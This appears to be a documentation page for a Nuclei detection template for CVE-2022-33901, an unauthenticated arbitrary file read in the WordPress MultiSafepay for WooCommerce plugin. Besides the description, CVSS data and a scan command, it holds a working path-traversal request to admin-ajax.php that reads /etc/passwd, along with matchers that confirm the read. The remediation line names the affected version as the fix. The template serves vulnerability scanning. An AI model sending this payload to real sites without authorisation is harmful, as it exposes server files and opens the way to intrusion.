WordPress MultiSafepay for WooCommerce <=4.13.1 - Arbitrary File Read
ID: CVE-2022-33901
Severity: high
Author: theamanrawat
Tags: cve2022,cve,wp-plugin,wp,wordpress,unauth,multisafepay,woocommerce
Description
Section titled “Description”WordPress MultiSafepay for WooCommerce plugin through 4.13.1 contains an arbitrary file read vulnerability. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
YAML Source
Section titled “YAML Source”id: CVE-2022-33901
info: name: WordPress MultiSafepay for WooCommerce <=4.13.1 - Arbitrary File Read author: theamanrawat severity: high description: | WordPress MultiSafepay for WooCommerce plugin through 4.13.1 contains an arbitrary file read vulnerability. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. impact: | An attacker can access sensitive information stored in arbitrary files on the server, potentially leading to further compromise of the system. remediation: | Update WordPress MultiSafepay for WooCommerce plugin to version 4.13.1 or later. reference: - https://wordpress.org/plugins/multisafepay/ - https://wordpress.org/plugins/multisafepay/#developers - https://patchstack.com/database/vulnerability/multisafepay/wordpress-multisafepay-plugin-for-woocommerce-plugin-4-13-1-unauthenticated-arbitrary-file-read-vulnerability - https://nvd.nist.gov/vuln/detail/CVE-2022-33901 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-33901 epss-score: 0.00779 epss-percentile: 0.81349 cpe: cpe:2.3:a:multisafepay:multisafepay_plugin_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: multisafepay product: multisafepay_plugin_for_woocommerce framework: wordpress tags: cve2022,cve,wp-plugin,wp,wordpress,unauth,multisafepay,woocommerce
http: - method: GET path: - "{{BaseURL}}/wp-admin/admin-ajax.php?action=admin_init&log_filename=../../../../../../../../../../../../../etc/passwd"
matchers-condition: and matchers: - type: word part: header words: - "application/octet-stream"
- type: regex part: body regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 490a00463044022025de808632a5b457f0e96bbd1ea2e5758100c5df1225aff00d22196a3c0ec69202207ea165651c646d2aab79c34b558306e47f9121e28557d1299b24cf681b09e0bf:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-33901.yaml"